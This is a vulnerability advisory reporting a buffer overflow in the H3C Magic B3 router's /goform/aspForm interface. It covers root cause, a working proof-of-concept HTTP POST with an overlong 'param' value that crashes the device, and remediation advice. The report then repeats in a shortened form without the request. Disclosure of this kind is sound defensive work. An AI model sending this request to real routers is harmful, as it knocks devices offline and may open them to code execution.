Vulnerability Title
Buffer Overflow Vulnerability in H3C Magic B3 Router /goform/aspForm Interface
Submitter
- Reporter: ZiMing Yin(殷子明)
Information
Vendor: New H3C Technologies Co., Ltd.
Vendor Website: https://www.h3c.com/cn/
Affected Product: Magic B3
Affected Firmware Version: Magic B3 <= 100R002
Firmware Download Address: https://www.h3c.com/cn/Home/Agreement//default.htm?t=H3C%20Magic%20%20B3%20V100R002%20%E7%89%88%E6%9C%AC%E8%BD%AF%E4%BB%B6%E5%8F%8A%E8%AF%B4%E6%98%8E%E4%B9%A6&s=3125484
Overview
A serious buffer overflow vulnerability exists in the H3C Magic B3 router. An attacker can trigger this vulnerability by accessing the /goform/aspForm interface and supplying a crafted param parameter, which may result in a denial of service (DoS) condition and, under specific circumstances, potentially lead to remote code execution. The exact trigger point is located in the UpdateWanParams related processing logic.
Vulnerability Details
1. Request Handler Entry Point
The following screenshot shows the entry point of the vulnerable request handler:
[Screenshot Placeholder 1: Request handler entry point]
2. Root Cause Analysis
According to the reverse engineering results, although the length of Var is restricted to less than 512 bytes, the subsequent copy operation does not verify whether the data exceeds the size of the destination array _0.0.0.0_4, which is only 64 bytes long. This ultimately leads to a buffer overflow.
In other words, there is a clear inconsistency between the parameter validation logic and the actual memory copy operation: the initial length restriction is insufficient to ensure the safety of the destination buffer, allowing an attacker to use an overly long input to overwrite adjacent memory.
[Screenshot Placeholder 2: Length restriction and dangerous copy logic]
Proof of Concept (PoC)
An attacker can trigger the vulnerability by sending the following HTTP request to the target device:
POST /goform/aspForm HTTP/1.1
Host: 192.168.124.1
Content-Length: 239
Cache-Control: max-age=0
Origin: http://192.168.124.1
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.124.1/mobile_access_net.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: USERLOGINIDFLAG=; LOGIN_PSD_REM_FLAG=
Connection: close
CMD=UpdateWanParams¶m=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;bb
The above request passes overly long data through the param parameter, triggering the overflow point in the UpdateWanParams processing logic and causing abnormal device behavior.
[Screenshot Placeholder 3: Vulnerability trigger result]
Impact
This vulnerability may result in the following security impacts:
- Crash of the device’s Web management service
- Denial of service (DoS) on the router
- Inaccessibility of the management page or abnormal device reboot
- Potential for further exploitation leading to remote code execution under specific conditions
Because the vulnerability is located in the parameter handling and memory copy logic, and the overwrite risk is relatively direct, it presents a high security risk.
Remediation
- Perform strict length validation on all Web interface input parameters and ensure that the validation logic is consistent with the actual size of the destination buffer.
- Avoid dangerous copy operations that may cause out-of-bounds writes; use safer functions with explicit boundary limits.
- Add destination buffer size checks in the UpdateWanParams related logic to ensure that the copy length never exceeds the actual capacity of the target array.
- It is recommended that the vendor release a patched version as soon as possible, and that users upgrade to a secure firmware version promptly.
- It is recommended to enable security mechanisms such as stack protection and FORTIFY_SOURCE during compilation to reduce the risk of similar vulnerabilities being exploited.
Notes
Based on the current material, the core issue of this vulnerability is that although the input variable Var is limited to less than 512 bytes, the program does not perform a secondary boundary check before copying it into a destination array of only 64 bytes. As a result, this forms a typical buffer overflow vulnerability. This issue is more accurately described as a buffer overflow caused by inconsistency between input length validation and actual destination buffer size.
Vulnerability Title
Buffer Overflow Vulnerability in H3C Magic B3 Router /goform/aspForm Interface
Submitter
Information
Vendor: New H3C Technologies Co., Ltd.
Vendor Website: https://www.h3c.com/cn/
Affected Product: Magic B3
Affected Firmware Version: Magic B3 <= 100R002
Firmware Download Address: https://www.h3c.com/cn/Home/Agreement//default.htm?t=H3C%20Magic%20%20B3%20V100R002%20%E7%89%88%E6%9C%AC%E8%BD%AF%E4%BB%B6%E5%8F%8A%E8%AF%B4%E6%98%8E%E4%B9%A6&s=3125484
Overview
A serious buffer overflow vulnerability exists in the H3C Magic B3 router. An attacker can trigger this vulnerability by accessing the /goform/aspForm interface and supplying a crafted param parameter, which may result in a denial of service (DoS) condition and, under specific circumstances, potentially lead to remote code execution. The exact trigger point is located in the UpdateWanParams related processing logic.
Vulnerability Details
1. Request Handler Entry Point
The following screenshot shows the entry point of the vulnerable request handler:
[Screenshot Placeholder 1: Request handler entry point]
2. Root Cause Analysis
According to the reverse engineering results, although the length of Var is restricted to less than 512 bytes, the subsequent copy operation does not verify whether the data exceeds the size of the destination array _0.0.0.0_4, which is only 64 bytes long. This ultimately leads to a buffer overflow.
In other words, there is a clear inconsistency between the parameter validation logic and the actual memory copy operation: the initial length restriction is insufficient to ensure the safety of the destination buffer, allowing an attacker to use an overly long input to overwrite adjacent memory.
[Screenshot Placeholder 2: Length restriction and dangerous copy logic]
Proof of Concept (PoC)
An attacker can trigger the vulnerability by sending the following HTTP request to the target device:
The above request passes overly long data through the param parameter, triggering the overflow point in the UpdateWanParams processing logic and causing abnormal device behavior.
[Screenshot Placeholder 3: Vulnerability trigger result]
Impact
This vulnerability may result in the following security impacts:
Because the vulnerability is located in the parameter handling and memory copy logic, and the overwrite risk is relatively direct, it presents a high security risk.
Remediation
Notes
Based on the current material, the core issue of this vulnerability is that although the input variable Var is limited to less than 512 bytes, the program does not perform a secondary boundary check before copying it into a destination array of only 64 bytes. As a result, this forms a typical buffer overflow vulnerability. This issue is more accurately described as a buffer overflow caused by inconsistency between input length validation and actual destination buffer size.